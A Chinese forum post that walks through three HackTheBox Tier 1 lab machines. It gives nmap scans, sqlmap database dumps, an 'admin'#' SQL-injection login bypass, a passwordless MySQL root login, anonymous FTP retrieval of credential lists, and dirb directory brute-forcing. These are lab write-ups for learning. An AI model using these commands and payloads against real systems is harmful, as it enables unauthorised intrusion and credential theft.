玩转HackTheBox靶场:攻略与技巧(二)

当我们深入学习HackTheBox靶场关卡时,TIER1关卡是我们接下来要探讨的重点。通过直播,我们已经详细解释了TIER0,现在我们将专注于TIER1的关卡。

图片[1]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

Appointment

这个关卡主要涉及到SQL注入相关的知识。我们首先执行端口扫描:

nmap -T4 -A 10.129.23.47

图片[2]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

扫描结果显示只有80端口开放,很明显这是一个Web站点。访问该IP:

图片[3]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

既然存在SQL注入,我们使用Burp进行抓包,将数据放到SQLmap中进行扫描:

图片[4]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛
  1. 将数据包保存为txt文件。
  2. 执行以下命令:

sqlmap -r “22.txt” –dbs

图片[5]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

成功获取数据库信息。接下来,我们可以获取表信息和字段信息:

sqlmap -r “22.txt” -D appdb –tables sqlmap -r “22.txt” -D appdb -T users –columns

图片[6]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

当然,除了使用SQLmap,还有更简单的方法,直接使用通用账号进行登录,如admin’#

图片[7]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

Sequle

同样,我们选定设备进行端口扫描:

nmap -sC -sV 10.129.95.232

图片[8]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

结果显示目标开启了3306 MySQL端口。既然目标使用了MySQL相关端口,我们可以尝试暴力破解或匿名登录:

mysql -h 10.129.95.232 -u root -p

成功登录后,执行以下命令:

show databases; #显示数据库 use htb; #选择数据库 show tables; #显示表 select * from config; #查询表

成功获取flag。

图片[9]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

Crocodile

同样,启动靶场后我们对目标进行端口扫描:

nmap -sC -sV 10.129.104.219

图片[10]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

结果显示目标开启了21和80端口。并且21端口可以匿名登录。我们首先登录ftp来查看:

图片[11]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

ftp 10.129.104.219 get allowed.userlist # 用户列表 get allowed.userlist.passwd # 密码列表

两个文件似乎存放了账号和密码。然后我们访问80端口:

图片[12]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

dirb http://10.129.104.219 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -X .php

图片[13]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

使用下载后的账号和密码进行登录。这里我使用Burp抓包后进行枚举破解。

图片[14]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛
图片[15]-玩转HackTheBox靶场:攻略与技巧(二)-山海云端论坛

成功获取flag。

© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容